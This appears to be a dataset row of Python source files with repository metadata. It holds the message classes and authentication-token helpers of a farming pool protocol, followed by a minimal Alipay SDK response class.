# Response in success case
@dataclass(frozen=True)
@streamable
class GetFarmerResponse(Streamable):
authentication_public_key: G1Element
payout_instructions: str
current_difficulty: uint64
current_points: uint64
# POST /farmer
@dataclass(frozen=True)
@streamable
class PostFarmerPayload(Streamable):
launcher_id: bytes32
authentication_token: uint64
authentication_public_key: G1Element
payout_instructions: str
suggested_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class PostFarmerRequest(Streamable):
payload: PostFarmerPayload
signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PostFarmerResponse(Streamable):
welcome_message: str
# PUT /farmer
@dataclass(frozen=True)
@streamable
class PutFarmerPayload(Streamable):
launcher_id: bytes32
authentication_token: uint64
authentication_public_key: Optional[G1Element]
payout_instructions: Optional[str]
suggested_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class PutFarmerRequest(Streamable):
payload: PutFarmerPayload
signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PutFarmerResponse(Streamable):
authentication_public_key: Optional[bool]
payout_instructions: Optional[bool]
suggested_difficulty: Optional[bool]
# Misc
# Response in error case for all endpoints of the pool protocol
@dataclass(frozen=True)
@streamable
class ErrorResponse(Streamable):
error_code: uint16
error_message: Optional[str]
# Get the current authentication toke according "Farmer authentication" in SPECIFICATION.md
def get_current_authentication_token(timeout: uint8) -> uint64:
return uint64(int(int(time.time() / 60) / timeout))
# Validate a given authentication token against our local time
def validate_authentication_token(token: uint64, timeout: uint8):
return abs(token - get_current_authentication_token(timeout)) <= timeout
| [
"svginsomnia@gmail.com"
] | svginsomnia@gmail.com |
3e95aaa34291786d7b1e43802787d3b150378db0 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayCommerceEducateTuitioncodePlanDisburseResponse.py | b68b5df3dd899650dcb85ee7430d2c745ecd58df | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 497 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceEducateTuitioncodePlanDisburseResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).__init__()
def parse_response_content(self, response_content):
response = super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).parse_response_content(response_content)
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.